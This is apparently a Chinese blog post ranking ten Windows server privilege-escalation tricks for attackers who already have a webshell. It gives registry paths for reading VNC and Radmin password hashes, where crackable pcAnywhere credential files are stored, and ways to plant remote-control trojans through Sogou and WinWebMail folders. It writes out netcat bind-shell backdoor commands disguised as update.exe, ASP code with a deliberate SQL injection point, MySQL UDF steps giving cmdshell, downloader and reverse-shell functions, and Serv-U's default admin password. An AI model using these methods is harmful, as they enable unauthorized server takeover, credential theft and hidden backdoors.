No.10 Vnc
Vnc不少老外都在用,国内用的比较少,但是几率很大。==============VNC提权方法==============利用shell读取vnc保存在注册表中的密文,使用工具VNC4X破解注册表位置:HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4\password69 45150 96177 b1243 f3153 9989 59148 9422 16No.9 RadminRadmin 是一款很不错的服务器管理无论是远程桌面控制,还是文件传输,速度都很快,很方便。 Radmin 默认端口是4899,无密码。不过服务器注重的是安全,一定会修改默认端口和密码的,端口与密码读取位置:HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Parameter//默认密码注册表位置HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Port //默认端口注册表位置以前我们可以用海洋***所带的功能来读出键值,然后进行转换得到hash值,但是现在有个更方便的东西,把ASP文件传到服务器上,打开可直接读出Radmin的hash和Radmin服务端口! No.8 PcAnywherePcAnywhere是一款用得很多的远程管理软件,他有一个重大漏洞是保存远程管理员帐号的CIF文件密码,是可以被轻易解密的,如果我们拿到一台主机的WEBSEHLL。通过查找发现其上安装有PCANYWhere 同时保存密码文件的目录是允许我们的IUSER权限访问,我们可以下载这个CIF文件到本地破解,再通过PCANYWhere从本机登陆服务器。思路简单而明确。Ps:保存密码的CIF文件,不是位于PCANYWhere的安装目录,而且位于安装PCANYWhere所安装盘的\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 如果PCANYWhere安装在D:\program\文件下下,那么PCANYWhere的密码文件就保存在D:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\文件夹下。No.7 搜狗输入法不少管理都使用五笔打字,不过还是有少数人喜欢用拼音,智能ABC功能少,没有全拼功能,所以大多都选择了搜狗输入法。搜狗输入法根目录下有一个:PinyinUp.exe 是用来更新词典用的,管理员为了保存词库,有可能会把搜狗输入法安装到D盘,搜狗输入法目录默认是Everyone可读可写,直接捆绑上远控等下次重启就会上线了。No.6 WinWebMail企业邮局系统 7i24.comWinWebMail目录下的web必须设置everyone权限可读可写,不然邮件登陆不上去等等,所以在开始程序里找到WinWebMail快捷方式下下来,看路径,访问 路径\web传shell,访问shell后,权限是system,放远控进启动项,等待下次重启。没有删cmd组建的直接加用户。7i24的web目录也是可写,权限为administrator。No.5 NC反弹nc的使用实例c:\nc.exe -l -p 4455 -d -e cmd.exe 可以很好的隐藏一个NetCat后门。c:\nc.exe -p 4455 -d -L -e cmd.exe 这个命令可以让***利用NetCat重新返回系统,直到系统管理员在任务管理器中看见nc.exe在运行,从而发现这个后门,我们一样可以把它做的更加隐蔽,c:\move nc.exe c:\windows\system32\Drivers\update.exec:\windows\systeme32\drivers\update.exe -p 4455 -d -L -e cmd.exe系统管理员可能把特权附属于一些无害的程序,如update.exe等,***也可以隐藏命令行。c:\windows\systme32\drivers\update.execmd line: -l -p 4455 -d -L -e cmd.exec:\>nc -l - p 80 监听80端口nc -l -p 80 >c:\log.dat 监听80端口,并把信息记录到log.dat中nc -v -l -p 80 监听80端口,并显示端口信息nc -vv -l -p 80 监听80端口,显示更详细的端口信息nc -l -p 80 -t -e cmd.exe监听本地的80端口的入站信息,同时将cmd.exe重定向到80端口,当有人连接的时候,就让cmd.exe以telnet的形式应答。当然这个最好用在控制的肉鸡上。nc -v ip port 扫瞄某IP的某个端口nc -v -z ip port-port扫描某IP的端口到某端口nc -v -z -u ip port-port扫描某IP的某UDP端口到某UDP端口No.4 mssql(sa) mysql(root)sa 1433对外关闭的话,可以构建注入点。<% strSQLServerName = "服务器ip" strSQLDBUserName = "数据库帐号" strSQLDBPassword = "数据库密码" strSQLDBName = "数据库名称" Set conn = Server.createObject("ADODB.Connection")strCon = "Provider=SQLOLEDB.1;Persist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & ";Password=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"conn.open strCondim rs,strSQL,id set rs=server.createobject("ADODB.recordset") id = request("id") strSQL = "select * from ACTLIST where worldid=" & idrs.open strSQL,conn,1,3 rs.close root su.php配合udf.dll提权第一步:将PHP文件上传到目标机上,填入你的MYSQL账号经行连接。第二步:连接成功后,导出DLL文件,导出时请勿必注意导出路径(一般情况下对任何目录可写,无需考虑权限问题),对于MYSQL5.0以上版本,你必须 将DLL导出到目标机器的系统目录(win 或 system32),否则在下一步操作中你会看到"No paths allowed for shared library"错误。第三步:使用SQL语句创建功能函数。语法:Create Function 函数名(函数名只能为下面列表中的其中之一) returns string soname '导出的DLL路径';对于MYSQL5.0以上版本,语句中的DLL不允许带全路径,如果你在第二步中已将DLL导出到系统目录,那么你就可以省略路径 而使命令正常执行,否则你将会看到"Can't open shared library"错误,这时你必须将DLL重新导出到系统目录。第四步:正确创建功能函数后,你就可以用SQL语句来使用这些功能了。语法:select 创建的函数名('参数列表'); 每个函数有不同的参数,你可以使用select 创建的函数名('help');来获得指定函数的参数列表信息。udf.dll功能函数说明:cmdshell 执行cmd;downloader 下载者,到网上下载指定文件并保存到指定目录;open3389 通用开3389终端服务,可指定端口(不改端口无需重启);backshell 反弹Shell;ProcessView 枚举系统进程;KillProcess 终止指定进程;regread 读注册表;regwrite 写注册表;shut 关机,注销,重启;about 说明与帮助函数;No.3 03 0day如果支持Asp.Net组件,传Asp.Net Shell,传cmd(在Asp环境下也成功过,不过介绍上写的必须以Asp.Net运行) 使用方法:Churrasco.exe "命令"No.2 Serv-u漏洞是使用Serv-u本地默认管理端口,以默认管理员登陆新建域和用户来执行命令,Serv-u>3.x版本默认本地管理端口是:43958,默认管理员:LocalAdministrator,默认密码:#l@$ak#.lk;0@P,这是集成在Serv-u内部的,可以以Guest权限来进行连接,对Serv-u进行管理。No.1 0day文章如转载,请注明转载自【网管小王的独立博客】: